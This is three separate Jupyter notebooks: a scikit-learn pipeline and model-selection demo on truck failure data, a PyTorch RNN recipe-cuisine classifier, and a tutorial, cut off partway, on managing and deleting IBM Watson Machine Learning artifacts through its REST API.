# Investigation into Sklearn Pipelines for Scaling and Model Selection Using http://scikit-learn.org/stable/modules/generated/sklearn.pipeline.Pipeline.html and data https://archive.ics.uci.edu/ml/datasets/APS+Failure+at+Scania+Trucks ``` import numpy as np import pandas as pd import re import os from pandas.plotting import scatter_matrix get_ipython().magic(u'env OMP_NUM_THREADS=2') from IPython.display import display, HTML import sklearn import sklearn.model_selection import requests import io import random # Set the ransom seed used for the whole program to allow reprocibility np.random.seed(3214412) DEBUG = True # If true, pull a sample of the dataset for development local_archive = "aps_failure_training_set.csv" if not os.path.exists(local_archive): print("Downloading contents") data_url = "https://archive.ics.uci.edu/ml/machine-learning-databases/00421/aps_failure_training_set.csv" contents=requests.get(data_url).content # First 20 rows of the file is a header with licensing info # The header with column names is on row 21 raw_data_df=pd.read_csv(io.StringIO(contents.decode('utf-8')), skiprows=20, na_values="na") raw_data_df.to_csv(local_archive, index=False) else: print("Loading from local") raw_data_df=pd.read_csv(local_archive, na_values="na") raw_data_df.head() # This is a poc on sklearn-pipelines so drop down to 10 columns # Grab the 10 columns with the least number of null values and column "class" data_df = raw_data_df[raw_data_df.isnull().sum().sort_values()[:11].index].dropna() data_df.head() print("Count of rows: {}".format(data_df.shape[0])) print("Count of rows with class 'neg': {}".format(data_df[data_df['class'] == 'neg']['class'].shape[0])) print("Count of rows with class 'pos': {}".format(data_df[data_df['class'] == 'pos']['class'].shape[0])) # Describe all the columns at once display(pd.concat([data_df[col].describe().to_frame(name=col) for col in data_df.columns if col != 'class'], axis=1)) display(data_df['class'].value_counts()) ``` ## Pipeline POC work ``` train_df = data_df.drop(labels=['class'], axis=1) labels_srs = data_df['class'] ``` ### Basic scaling ``` from sklearn.preprocessing import StandardScaler from sklearn.feature_selection import SelectKBest, chi2 from sklearn.pipeline import Pipeline from sklearn import svm scaling = StandardScaler() svm_model = svm.SVC(kernel='linear') chi_f_selection = SelectKBest(score_func=chi2, k=8) pipeline_model = Pipeline([ ('chi_selection', chi_f_selection), ('scaling', scaling), ('svc', svm_model)]) fit_model = pipeline_model.fit(train_df, labels_srs) # Now try it out print("score: {}".format(fit_model.score(train_df, y=labels_srs))) print("Sample of Predictions:\n{}".format(fit_model.predict(train_df.sample(n=50)))) ``` ### Grid Search over Pipeline paramaters 1. Feature selection functions and parameters ``` from sklearn.feature_selection import SelectKBest, chi2, f_classif, f_regression from sklearn.model_selection import GridSearchCV scaling = StandardScaler() svm_model = svm.SVC(kernel='linear') chi_f_selection = SelectKBest(score_func=chi2, k=8) pipeline_model = Pipeline([ ('chi_selection', chi_f_selection), ('scaling', scaling), ('svc', svm_model)]) # Commented a few options out in the interest of POC and time param_grid = [ { 'chi_selection__score_func': [chi2], #, f_regression, f_classif], 'scaling__with_mean': [True],#, False], 'scaling__with_std': [True],#, False], 'svc__C': [0.5]#, 1, 5, 10] } ] grid = GridSearchCV(pipeline_model, cv=3, n_jobs=3, param_grid=param_grid) grid_fit_model = grid.fit(train_df, labels_srs) # Now try it out print("score: {}".format(grid_fit_model.score(train_df, y=labels_srs))) print("Sample of Predictions:\n{}".format(grid_fit_model.predict(train_df.sample(n=50)))) print("Best Parameters") grid_fit_model.best_params_ ``` ### Cross Validation score prediction ``` from sklearn.model_selection import cross_val_score cross_val_score(grid_fit_model, train_df, labels_srs, cv=3) ``` ## Bootstrapping ``` from sklearn.ensemble import AdaBoostClassifier from sklearn.tree import DecisionTreeClassifier scaling = StandardScaler() dtc_model = DecisionTreeClassifier() ab_dtc_model = AdaBoostClassifier(dtc_model) chi_f_selection = SelectKBest(score_func=chi2, k=8) pipeline_model = Pipeline([ ('chi_selection', chi_f_selection), ('scaling', scaling), ('boost', ab_dtc_model)]) # Commented a few options out in the interest of POC and time param_grid = [ { 'chi_selection__score_func': [chi2], #, f_regression, f_classif], 'scaling__with_mean': [True],#, False], 'scaling__with_std': [True],#, False], 'boost__n_estimators': [10, 50, 200], 'boost__base_estimator': [DecisionTreeClassifier(max_depth=1, min_samples_leaf=1), DecisionTreeClassifier(max_depth=5, min_samples_leaf=3)] } ] grid = GridSearchCV(pipeline_model, cv=3, n_jobs=6, param_grid=param_grid) grid_fit_model = grid.fit(train_df, labels_srs) # Now try it out print("score: {}".format(grid_fit_model.score(train_df, y=labels_srs))) print("Sample of Predictions:\n{}".format(grid_fit_model.predict(train_df.sample(n=50)))) print("Best Parameters") grid_fit_model.best_params_ ``` ## Model Selection ``` from sklearn.neighbors import KNeighborsClassifier from sklearn.svm import SVC from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier classifiers = dict( knn3=KNeighborsClassifier(3), svc=SVC(kernel="linear", C=0.025), tree=DecisionTreeClassifier(max_depth=5), forest=RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1), boost=AdaBoostClassifier() ) from sklearn.preprocessing import StandardScaler from sklearn.feature_selection import SelectKBest, chi2 from sklearn.pipeline import Pipeline from sklearn import svm scaling = StandardScaler() svm_model = svm.SVC(kernel='linear') chi_f_selection = SelectKBest(score_func=chi2, k=8) def get_score(name, model): pipeline_model = Pipeline([ ('chi_selection', chi_f_selection), ('scaling', scaling), (name, model)]) fit_model = pipeline_model.fit(train_df, labels_srs) score = fit_model.score(train_df, y=labels_srs) return score results = {name: get_score(name, model) for name, model in classifiers.items()} for name, score in results.items(): print("{name}: score={score}".format(name=name, score=score)) ```
github_jupyter
``` import pandas as pd import numpy as np import torch import torch.nn as nn import torch.nn.functional as F from torch.utils.data import Dataset from torch.autograd import Variable import string import pickle as pkl import random import pdb import re from functools import partial from collections import Counter, defaultdict from sklearn.model_selection import train_test_split from sklearn.model_selection import KFold from sklearn.metrics import roc_auc_score import nltk from nltk.tokenize import word_tokenize from nltk.corpus import stopwords nltk.download('punkt') from gensim.models.keyedvectors import KeyedVectors import matplotlib.pyplot as plt RANDOM_STATE = 42 ``` ### Get pre-trained embeddings ``` # encode the pretrained embedding to text file model = KeyedVectors.load_word2vec_format('/home/hb1500/Plated/vocab.bin', binary=True) model.save_word2vec_format('pretrained_embd.txt', binary=False) # load embeddings # There are three types of embeddings: # pretrained_embd (from Recipe101); pretrained_embd (Recipe101 + Plated); Glove.6B.50d def load_emb_vectors(fname): data = {} with open(fname, 'r') as f: for line in f: splitLine = line.split() word = splitLine[0] embedding = np.array([float(val) for val in splitLine[1:]]) data[word] = embedding return data #fname = 'pretrained_embd.txt' #fname = '/Users/hetianbai/Desktop/DS-GA 1011/Labs/lab5/glove.6B/glove.6B.50d.txt' fname = '/scratch/hb1500/Plated/glove.6B/glove.6B.50d.txt' words_emb_dict = load_emb_vectors(fname) ``` ### Load Cleaned Data ``` # the data is the output of "Consolidated Data Cleaning" data_all = pd.read_csv('/home/hb1500/Plated/cleaned_recipe_data.csv', index_col=0) # augmentated data saved to: https://drive.google.com/open?id=10Y3wExYdavqalI17d7KBI2RdKjRu4UP3 data_all_aug = pd.read_csv('/home/hb1500/Plated/augmented_instruction.csv', index_col=0) assert (data_all['external_id'].tolist() == data_all_aug['external_id'].tolist()) data_intruction = data_all[['external_id','step_one','step_two', 'step_three', 'step_four', 'step_five', 'step_six']] data_intruction_aug = data_all_aug[['external_id','step_one_sp', 'step_two_sp', 'step_three_sp', 'step_four_sp', 'step_five_sp', 'step_six_sp']] data_cuisine_tags = data_all[['external_id','tag_cuisine_indian', 'tag_cuisine_nordic', 'tag_cuisine_european', 'tag_cuisine_asian', 'tag_cuisine_mexican', 'tag_cuisine_latin-american', 'tag_cuisine_french', 'tag_cuisine_italian', 'tag_cuisine_african', 'tag_cuisine_mediterranean', 'tag_cuisine_american', 'tag_cuisine_middle-eastern']] ``` ### Tokenization ``` # lowercase and remove punctuation def tokenizer(sent): #print(sent) if pd.isnull(sent): words = [] else: table = str.maketrans(string.punctuation, ' '*len(string.punctuation)) sent = sent.translate(table) tokens = word_tokenize(sent) # convert to lower case tokens = [w.lower() for w in tokens] # remove punctuation from each word #table = str.maketrans('', '', string.punctuation) #stripped = [w.translate(table) for w in tokens] # remove remaining tokens that are not alphabetic words = [word for word in tokens if word.isalpha()] #re.findall(r'\d+', 'sdfa') return words def tokenize_dataset(step_n): """returns tokenization for each step, training set tokenizatoin""" token_dataset = [] for sample in step_n: tokens = tokenizer(sample) token_dataset.append(tokens) return token_dataset def all_tokens_list(train_data): """returns all tokens of instruction (all steps) for creating vocabulary""" all_tokens = [] for columns in train_data.columns[1:]: for sample in train_data[columns]: all_tokens += sample[:] return all_tokens print('Processing original instruction data') # tokenize each steps on original datasets data_instruction_tokenized = pd.DataFrame() for steps in data_intruction.columns[1:]: data_instruction_tokenized[steps] = tokenize_dataset(data_intruction[steps]) print(steps, 'has been tokenized.') data_instruction_tokenized['external_id'] = data_intruction['external_id'] # tokenize each steps on augmented datasets print('Processing augmented instruction data') data_instruction_aug_tokenized = pd.DataFrame() for steps in data_intruction_aug.columns[1:]: data_instruction_aug_tokenized[steps] = tokenize_dataset(data_intruction_aug[steps]) print(steps, 'has been tokenized.') data_instruction_aug_tokenized['external_id'] = data_intruction_aug['external_id'] assert (data_instruction_tokenized.shape[0] == data_cuisine_tags.shape[0]) assert (data_instruction_tokenized.shape[0] == data_instruction_aug_tokenized.shape[0]) # add tags to tokenized dataframe data_instruction_tokenized = data_instruction_tokenized.merge(data_cuisine_tags, on = 'external_id') data_instruction_aug_tokenized = data_instruction_aug_tokenized.merge(data_cuisine_tags, on = 'external_id') ## save #data_instruction_tokenized.to_csv('data_instruction_tokenized.csv') #data_instruction_aug_tokenized.to_csv('data_instruction_aug_tokenized.csv') ``` Naming two dataframes: one for intructions (with id) and the other for tags (with id) ``` data_intruction = data_instruction_tokenized[['external_id','step_one','step_two', 'step_three', 'step_four', 'step_five', 'step_six']] data_tags = data_instruction_tokenized[['external_id','tag_cuisine_indian', 'tag_cuisine_nordic', 'tag_cuisine_european', 'tag_cuisine_asian', 'tag_cuisine_mexican', 'tag_cuisine_latin-american', 'tag_cuisine_french', 'tag_cuisine_italian', 'tag_cuisine_african', 'tag_cuisine_mediterranean', 'tag_cuisine_american', 'tag_cuisine_middle-eastern']] ``` Split train and test sets ``` X_train, test_data, y_train, test_tags = train_test_split(data_intruction, data_tags, test_size=0.1, random_state=RANDOM_STATE) #train_data, val_data, train_tags, val_tags = train_test_split(X_train, y_train, test_size=0.1, random_state=RANDOM_STATE) ``` Cross validation for train and validation ``` kf = KFold(n_splits=5, shuffle=False, random_state=RANDOM_STATE) k = 1 for train_index, val_index in kf.split(X_train): print('===================== This is the Kfold {} ====================='.format(k)) k += 1 train_data, val_data = X_train.iloc[train_index], X_train.iloc[val_index] train_tags, val_tags = y_train.iloc[train_index], y_train.iloc[val_index] if params['add_data_aug']: ##### add augmentation to training set by index ##### train_data_aug = data_instruction_aug_tokenized[data_instruction_aug_tokenized['external_id'].isin(list(train_data['external_id']))] train_data_aug_instrc = train_data_aug[['external_id', 'step_one_sp', 'step_two_sp', 'step_three_sp', 'step_four_sp', 'step_five_sp', 'step_six_sp']] train_data_aug_instrc.columns = ['external_id','step_one','step_two', 'step_three', 'step_four', 'step_five', 'step_six'] train_data_aug_label = train_data_aug[['external_id','tag_cuisine_indian', 'tag_cuisine_nordic', 'tag_cuisine_european','tag_cuisine_asian', 'tag_cuisine_mexican', 'tag_cuisine_latin-american', 'tag_cuisine_french', 'tag_cuisine_italian', 'tag_cuisine_african', 'tag_cuisine_mediterranean', 'tag_cuisine_american', 'tag_cuisine_middle-eastern']] # concatenate dfs train_data = pd.concat([train_data, train_data_aug_instrc],axis=0, ignore_index=True) train_tags = pd.concat([train_tags, train_data_aug_label],axis=0, ignore_index=True) ##### add augmentation to training set by index ##### # lookup table all_train_tokens = all_tokens_list(train_data) max_vocab_size = len(list(set(all_train_tokens))) token2id, id2token = build_vocab(all_train_tokens, max_vocab_size) random_token_id = random.randint(0, len(id2token)-1) random_token = id2token[random_token_id] emb_weight = build_emb_weight(words_emb_dict, id2token) train_data_indices = token2index_dataset(train_data, token2id) val_data_indices = token2index_dataset(val_data, token2id) test_data_indices = token2index_dataset(test_data, token2id) # batchify datasets: train_loader, val_loader, test_loader = create_dataset_obj(train_data_indices, val_data_indices, test_data_indices, train_targets, val_targets, test_targets, BATCH_SIZE, max_sent_len, collate_func) #load pre-embeddings weights_matrix = torch.from_numpy(emb_weight) # define model model_train(rnn_1,hidden_dim1,bi,rnn_2, hidden_dim2, batch_size, cuda_on, num_classes) break ``` All tokens from training set ``` # form all tokens list all_train_tokens = all_tokens_list(train_data) ``` Let's decide which tag to predict for trail ``` data_cuisine_tags.iloc[:,1:].sum()/data_cuisine_tags.iloc[:,1:].shape[0] ``` Choose tag: tag_cuisine_american, which 27.3525% are 1 ### Build vocabulary and indexing ``` len(list(set(all_train_tokens))) token_counter = Counter(all_train_tokens) # token_counter.most_common # save index 0 for unk and 1 for pad def build_vocab(all_tokens, max_vocab_size): # Returns: # id2token: list of tokens, where id2token[i] returns token that corresponds to token i # token2id: dictionary where keys represent tokens and corresponding values represent indices PAD_IDX = 0 UNK_IDX = 1 token_counter = Counter(all_tokens) vocab, count = zip(*token_counter.most_common(max_vocab_size)) id2token = list(vocab) token2id = dict(zip(vocab, range(2,2+len(vocab)))) id2token = ['<pad>', '<unk>'] + id2token token2id['<pad>'] = PAD_IDX token2id['<unk>'] = UNK_IDX return token2id, id2token max_vocab_size = len(list(set(all_train_tokens))) token2id, id2token = build_vocab(all_train_tokens, max_vocab_size) random_token_id = random.randint(0, len(id2token)-1) random_token = id2token[random_token_id] print("Token id {} ; token {}".format(random_token_id, id2token[random_token_id])) print("Token {}; token id {}".format(random_token, token2id[random_token])) def build_emb_weight(words_emb_dict, id2token): vocab_size = len(id2token) emb_dim = len(words_emb_dict['a']) emb_weight = np.zeros([vocab_size, emb_dim]) for i in range(2,vocab_size): emb = words_emb_dict.get(id2token[i], None) if emb is not None: emb_weight[i] = emb return emb_weight emb_weight = build_emb_weight(words_emb_dict, id2token) sum(np.sum(emb_weight,1)==0)/emb_weight.shape[0] ``` Reconstruct data strcuture for datasets ``` # convert token to id in the dataset def token2index_dataset(tokens_data, token2id): """returns [[[step1 indices],[step2 indices],...,[step6 indices]],[],[],...]""" recipie_indices_data = [] UNK_IDX = 1 for recipie in tokens_data.iterrows(): step_indices_data = [] for step in recipie[1]: index_list = [token2id[token] if token in token2id else UNK_IDX for token in step] step_indices_data.append(index_list) recipie_indices_data.append(step_indices_data) return recipie_indices_data train_data_indices = token2index_dataset(train_data, token2id) val_data_indices = token2index_dataset(val_data, token2id) test_data_indices = token2index_dataset(test_data, token2id) # double checking print ("Train dataset size is {}".format(len(train_data_indices))) print ("Val dataset size is {}".format(len(val_data_indices))) print ("Test dataset size is {}".format(len(test_data_indices))) class IntructionDataset(Dataset): """ Class that represents a train/validation/test dataset that's readable for PyTorch Note that this class inherits torch.utils.data.Dataset """ def __init__(self, data_list, tags_list, max_sent_len): """ @param data_list: list of recipie tokens @param target_list: list of single tag, i.e. 'tag_cuisine_american' """ self.data_list = data_list self.tags_list = tags_list assert (len(self.data_list) == len(self.tags_list)) def __len__(self): return len(self.data_list) def __getitem__(self, key): """ Triggered when you call recipie[i] """ recipie = self.data_list[key] step1_idx = recipie[0][:max_sent_len[0]] step2_idx = recipie[1][:max_sent_len[1]] step3_idx = recipie[2][:max_sent_len[2]] step4_idx = recipie[3][:max_sent_len[3]] step5_idx = recipie[4][:max_sent_len[4]] step6_idx = recipie[5][:max_sent_len[5]] label = self.tags_list[key] return [[step1_idx, step2_idx, step3_idx, step4_idx, step5_idx, step6_idx], [len(step1_idx),len(step2_idx), len(step3_idx),len(step4_idx), len(step5_idx),len(step6_idx)], label] def collate_func(batch): """ Customized function for DataLoader that dynamically pads the batch so that all data have the same length """ steps_dict = defaultdict(list) label_list = [] length_dict = defaultdict(list) max_sent_len = [] for datum in batch: label_list.append(datum[-1]) for i in range(6): length_dict[i].append(datum[1][i]) # padding for i in range(6): max_sent_len.append(max(length_dict[i])) for datum in batch: for i, step in enumerate(datum[0]): padded_vec = np.pad(np.array(step), pad_width=((0, max_sent_len[i]-datum[1][i])), mode="constant", constant_values=0) steps_dict[i].append(padded_vec) for key in length_dict.keys(): length_dict[key] = torch.LongTensor(length_dict[key]) steps_dict[key] = torch.from_numpy(np.array(steps_dict[key]).astype(np.int)) return [steps_dict, length_dict, torch.LongTensor(label_list)] # Build train, valid and test dataloaders def create_dataset_obj(train,val,test,train_targets,val_targets,test_targets, BATCH_SIZE,max_sent_len,collate_func): collate_func=partial(collate_func) train_dataset = IntructionDataset(train, train_targets, max_sent_len) train_loader = torch.utils.data.DataLoader(dataset=train_dataset, batch_size=BATCH_SIZE, collate_fn=collate_func, shuffle=True) val_dataset = IntructionDataset(val, val_targets, max_sent_len) val_loader = torch.utils.data.DataLoader(dataset=val_dataset, batch_size=BATCH_SIZE, collate_fn=collate_func, shuffle=False) test_dataset = IntructionDataset(test, test_targets, max_sent_len) test_loader = torch.utils.data.DataLoader(dataset=test_dataset, batch_size=BATCH_SIZE, collate_fn=collate_func, shuffle=False) return train_loader, val_loader, test_loader def create_emb_layer(weights_matrix, trainable=False): vocab_size, emb_dim = weights_matrix.size() emb_layer = nn.Embedding(vocab_size, emb_dim) emb_layer.load_state_dict({'weight': weights_matrix}) if trainable == False: emb_layer.weight.requires_grad = False return emb_layer, vocab_size, emb_dim class two_stage_RNN(nn.Module): def __init__(self, rnn_1, hidden_dim1, bi, rnn_2, hidden_dim2, batch_size, cuda_on, num_classes): super(two_stage_RNN, self).__init__() self.hidden_dim1 = hidden_dim1 self.hidden_dim2 = hidden_dim2 self.embedding, vocab_size, emb_dim = create_emb_layer(weights_matrix, trainable=False) # module for steps in the fisrt stage # self.hidden_stage1, self.hidden_stage2 = self.init_hidden(batch_size, cuda_on) rnn_common = rnn_1(emb_dim, hidden_dim1, num_layers=1, batch_first=True, bidirectional=bi) self.rnn_each_step = nn.ModuleList([]) for i in range(6): self.rnn_each_step.append(rnn_common) # module for the second stage if bi: self.steps_rnn = rnn_2(hidden_dim1*2, hidden_dim2, num_layers=1, batch_first=False) else: self.steps_rnn = rnn_2(hidden_dim1, hidden_dim2, num_layers=1, batch_first=False) # module for interaction self.linear = nn.Linear(hidden_dim2, num_classes) def forward(self, steps, lengths): # first stage output_each_step = [] for i in range(6): rnn_input = steps[i] emb = self.embedding(rnn_input) # embedding output, _ = self.rnn_each_step[i](emb) #, self.hidden_stage1[str(i)] if bi: output_size = output.size() output = output.view(output_size[0], output_size[1], 2, self.hidden_dim1) if bi: output_each_step.append(torch.cat((output[:,-1,0,:],output[:,0,1,:]),1)) else: output_each_step.append(output[:,-1,:]) #second stage output1 = torch.stack(output_each_step, 0) output, _ = self.steps_rnn(output1) #, self.hidden_stage2 logits = self.linear(output[-1,:,:]) #logits = torch.sigmoid(logits) return logits def test_model(loader, model): """ Help function that tests the model's performance on a dataset @param: loader - data loader for the dataset to test against """ logits_all = [] labels_all = [] model.eval() for steps_batch, lengths_batch, labels_batch in loader: for step_id in range(6): lengths_batch[step_id] = lengths_batch[step_id].cuda() steps_batch[step_id] = steps_batch[step_id].cuda() logits = model(steps_batch, lengths_batch) logits_all.extend(list(logits.cpu().detach().numpy())) labels_all.extend(list(labels_batch.numpy())) logits_all = np.array(logits_all) labels_all = np.array(labels_all) auc = roc_auc_score(labels_all, logits_all) predicts = (logits_all > 0.5).astype(int) acc = np.mean(predicts==labels_all) return auc, acc ``` tag_cuisine_indian 0.023525 85% auc tag_cuisine_nordic 0.000399 tag_cuisine_european 0.012360 tag_cuisine_asian 0.182217 98% auc tag_cuisine_mexican 0.013557 tag_cuisine_latin-american 0.094896 90% auc tag_cuisine_french 0.077352 72% auc tag_cuisine_italian 0.233254 80% auc tag_cuisine_african 0.003987 tag_cuisine_mediterranean 0.076555 88% auc tag_cuisine_american 0.273525 80% auc tag_cuisine_middle-eastern 0.046252 87% auc ``` tag_predicted = 'tag_cuisine_american' train_targets = list(train_tags[tag_predicted]) val_targets = list(val_tags[tag_predicted]) test_targets = list(test_tags[tag_predicted]) print(train_tags[tag_predicted].value_counts()) print(val_tags[tag_predicted].value_counts()) print(test_tags[tag_predicted].value_counts()) rnn_types = { 'rnn': nn.RNN, 'lstm': nn.LSTM, 'gru': nn.GRU } params = dict( rnn1_type = 'rnn', rnn2_type = 'rnn', bi = True, hidden_dim1 = 30, hidden_dim2 = 30, num_classes = 1, num_epochs = 5, batch_size = 50, learning_rate = 0.01, add_data_aug = True, cuda_on = True ) BATCH_SIZE = params['batch_size'] max_sent_len = np.array([94, 86, 87, 90, 98, 91]) train_loader, val_loader, test_loader = create_dataset_obj(train_data_indices, val_data_indices, test_data_indices, train_targets, val_targets, test_targets, BATCH_SIZE, max_sent_len, collate_func) #build model rnn1_type = params['rnn1_type'] rnn_1 = rnn_types[rnn1_type] rnn2_type = params['rnn2_type'] rnn_2 = rnn_types[rnn2_type] bi = params['bi'] hidden_dim1 = params['hidden_dim1'] hidden_dim2 = params['hidden_dim2'] num_classes = params['num_classes'] batch_size = params['batch_size'] cuda_on = params['cuda_on'] weights_matrix = torch.from_numpy(emb_weight) model = two_stage_RNN(rnn_1, hidden_dim1, bi, rnn_2, hidden_dim2, batch_size, cuda_on, num_classes) model_parameters = filter(lambda p: p.requires_grad, model.parameters()) print('The number of train parameters', sum([np.prod(p.size()) for p in model_parameters])) model = model.cuda() #parameter for training learning_rate = params['learning_rate'] num_epochs = params['num_epochs'] # number epoch to train # Criterion and Optimizer #pos_weight=torch.Tensor([40,]).cuda() criterion = nn.BCEWithLogitsLoss() #torch.nn.BCELoss(); torch.nn.CrossEntropyLoss() optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) train_loss_list = [] for epoch in range(num_epochs): for i, (steps_batch, lengths_batch, labels_batch) in enumerate(train_loader): for step_id in range(6): lengths_batch[step_id] = lengths_batch[step_id].cuda() steps_batch[step_id] = steps_batch[step_id].cuda() model.train() optimizer.zero_grad() outputs = model(steps_batch, lengths_batch) loss = criterion(outputs, labels_batch.view(-1,1).float().cuda()) train_loss_list.append(loss.item()) loss.backward() optimizer.step() # validate every 100 iterations if i % 10 == 0: # validate # print('---------------------') # for p in model.parameters(): # if p.requires_grad: # print(p.name, p.size(), p.requires_grad, torch.mean(torch.abs(p.data)), torch.mean(torch.abs(p.grad))) # break val_auc, val_acc = test_model(val_loader, model) print('{}/{}, Step:{}/{}, TrainLoss:{:.6f}, ValAUC:{:.6f} ValAcc:{:.6f}'.format( epoch+1, num_epochs, i+1, len(train_loader), loss, val_auc, val_acc)) val_auc, val_acc = test_model(val_loader, model) train_auc, train_acc = test_model(train_loader, model) print('Epoch: [{}/{}], trainAUC: {:.6f}, trainAcc: {:.6f}'.format(epoch+1, num_epochs, train_auc, train_acc)) print('Epoch: [{}/{}], ValAUC: {:.6f}, ValAcc: {:.6f}'.format(epoch+1, num_epochs, val_auc, val_acc)) def model_train(rnn_1,hidden_dim1,bi,rnn_2, hidden_dim2, batch_size, cuda_on, num_classes): model = two_stage_RNN(rnn_1, hidden_dim1, bi, rnn_2, hidden_dim2, batch_size, cuda_on, num_classes) model_parameters = filter(lambda p: p.requires_grad, model.parameters()) print('The number of train parameters', sum([np.prod(p.size()) for p in model_parameters])) model = model.cuda() #parameter for training learning_rate = params['learning_rate'] num_epochs = params['num_epochs'] # number epoch to train # Criterion and Optimizer criterion = nn.BCEWithLogitsLoss() #torch.nn.BCELoss(); torch.nn.CrossEntropyLoss() optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate) train_loss_list = [] train_AUC_list = [] val_AUC_list = [] train_ACC_list = [] val_ACC_list = [] for epoch in range(num_epochs): for i, (steps_batch, lengths_batch, labels_batch) in enumerate(train_loader): for step_id in range(6): lengths_batch[step_id] = lengths_batch[step_id].cuda() steps_batch[step_id] = steps_batch[step_id].cuda() model.train() optimizer.zero_grad() outputs = model(steps_batch, lengths_batch) loss = criterion(outputs, labels_batch.view(-1,1).float().cuda()) train_loss_list.append(loss.item()) loss.backward() optimizer.step() # validate every 10 iterations if i % 10 == 0: val_auc, val_acc = test_model(val_loader, model) print('{}/{}, Step:{}/{}, TrainLoss:{:.6f}, ValAUC:{:.6f} ValAcc:{:.6f}'.format( epoch+1, num_epochs, i+1, len(train_loader), loss, val_auc, val_acc)) val_auc, val_acc = test_model(val_loader, model) train_auc, train_acc = test_model(train_loader, model) train_AUC_list.append(train_auc) val_AUC_list.append(val_auc) train_ACC_list.append(train_acc) val_ACC_list.append(val_acc) print('Epoch: [{}/{}], trainAUC: {:.6f}, trainAcc: {:.6f}'.format(epoch+1, num_epochs, train_auc, train_acc)) print('Epoch: [{}/{}], ValAUC: {:.6f}, ValAcc: {:.6f}'.format(epoch+1, num_epochs, val_auc, val_acc)) return train_loss_list, train_AUC_list, val_AUC_list, train_ACC_list, val_ACC_list plt.plot(train_loss_list) plt.show() #train_loss_list print(model) for key, val in model.state_dict().items(): print(key, val.size()) logits_all = [] labels_all = [] model.eval() for steps_batch, lengths_batch, labels_batch in test_loader: for step_id in range(6): lengths_batch[step_id] = lengths_batch[step_id].cuda() steps_batch[step_id] = steps_batch[step_id].cuda() logits = model(steps_batch, lengths_batch) logits_all.extend(list(logits.cpu().detach().numpy())) labels_all.extend(list(labels_batch.numpy())) logits_all = np.array(logits_all) labels_all = np.array(labels_all) auc = roc_auc_score(labels_all, logits_all) predicts = (logits_all > 0.5).astype(int) acc = np.mean(predicts==labels_all) auc from sklearn import metrics fpr, tpr, thresholds = metrics.roc_curve(labels_all, logits_all, pos_label=1) plt.plot(fpr, tpr) for p in model.parameters(): if p.requires_grad: print(p.size()) ```
github_jupyter
# Machine Learning artifacts management This notebook contains steps and code to demonstrate how to manage and clean up Watson Machine Learning instance. This notebook contains steps and code to work with Watson Machine Learning API. This notebook introduces API calls for listing artifacts, getting artifacts details and deleting them. Some familiarity with Python and REST API is helpful. This notebook uses Python 3. ## Learning goals The learning goals of this notebook are: - List Watson Machine Learning artifacts. - Get artifacts details. - Delete artifacts. ## Contents This notebook contains the following parts: 1. [Setup](#setup) 2. [Manage pipelines](#pipelines) 3. [Manage model definitions](#model_definitions) 4. [Manage models](#models) 5. [Manage functions](#functions) 6. [Manage experiments](#experiments) 7. [Manage trainings](#trainings) 8. [Manage deployments](#deployments) 9. [Summary and next steps](#summary) <a id="setup"></a> ## 1. Set up the environment Before you use the sample code in this notebook, you must fill following cell variables. You can find your COS credentials in COS instance dashboard under the **Service credentials** tab. Go to the **Endpoint** tab in the COS instance's dashboard to get the endpoint information. Your Cloud API key can be generated by going to the [**Users** section of the Cloud console](https://cloud.ibm.com/iam#/users). From that page, click your name, scroll down to the **API Keys** section, and click **Create an IBM Cloud API key**. Give your key a name and click **Create**, then copy the created key and paste it below. **NOTE:** You can also get service specific apikey by going to the [**Service IDs** section of the Cloud Console](https://cloud.ibm.com/iam/serviceids). From that page, click **Create**, then copy the created key and paste it below. ``` API_KEY="" WML_ENDPOINT_URL="" WML_INSTANCE_CRN="fill out only if you want to create new space" WML_INSTANCE_NAME="fill out only if you want to create new space" COS_CRN="fill out only if you want to create new space" space_id="fill out only if you have already created a space" DATAPLATFORM_URL="https://api.dataplatform.cloud.ibm.com" AUTH_ENDPOINT="https://iam.cloud.ibm.com/oidc/token" ``` In order to work with REST API in python you need to import `requests` package. ``` import requests ``` <a id="wml_token"></a> ### Generate WML authorization token for further REST API calls Request params preparation. ``` token_creation_params = { "grant_type": "urn:ibm:params:oauth:grant-type:apikey", "apikey": API_KEY } ``` Token generation. ``` response = requests.post(AUTH_ENDPOINT, params=token_creation_params) token = response.json()['access_token'] print(token) ``` Define requests header for futher REST API calls. ``` header = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json', 'Accept': 'application/json' } ``` <a id="space_creation"></a> ### Space creation **Tip:** If you do not have `space` already created, please convert below three `Raw NBConvert` cells to `code` and run them. Prepare payload json for space creation. Create new space. Get created space id. Space creation is asynchronous. This means that you need to check space creation status after creation call. Make sure that your newly created space is `active`. Get space details. ``` space_details = requests.get( url = f"{DATAPLATFORM_URL}/v2/spaces/{space_id}?version=2020-08-01", headers = header ) space_details.json() ``` ### Managing spaces. If you want to get all spaces details you can run following REST API call. If you want to get part of spaces please change the `limit` variable. ``` limit=2 spaces_details = requests.get( url = f"{DATAPLATFORM_URL}/v2/spaces?limit={limit}", headers = header ) ``` Print spaces details json. ``` spaces_details.json() ``` If you want to list existing spaces names and ids run next cell. ``` for space in spaces_details.json()['resources']: print(f"{space['entity']['name']} \t Id: {space['metadata']['id']}") ``` If you want to delete one of existing spaces you can change next cell Format to `code` and use following REST API call. <a id="pipelines"></a> ## 2. Manage pipelines If you want to get all pipelines details you can run following REST API call. If you want to get part of pipelines please change the `limit` variable. ``` limit=2 pipelines_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/pipelines?version=2020-08-01&space_id={space_id}&limit={limit}", headers = header ) ``` If you want to list existing pipelines names and ids run next cell. ``` for pipeline in pipelines_details.json()['resources']: print(f"{pipeline['metadata']['name']} \t Id: {pipeline['metadata']['id']}") ``` Get pipeline 0 id. ``` pipeline_id = pipelines_details.json()['resources'][0]['metadata']['id'] print(pipeline_id) ``` If you want to get pipeline details you must provide `pipeline_id` and run following REST API call. ``` pipeline_details = requests.get( url = f"{WML_ENDPOINT_URL}/ml/v4/pipelines/{pipeline_id}?version=2020-08-01&space_id={space_id}", headers = header ) ``` Print pipeline details. ``` pipelines_details.json() ``` You can delete pipeline by next cell API CALL. ``` pipeline_delete = requests.delete( url = f"{WML_ENDPOINT_URL}/ml/v4/pipelines/{pipeline_id}?version=2020-08-01&space_id={space_id}", headers = header ) if pipeline_delete.status_code in [200,202,204]: print('SUCCES') else: 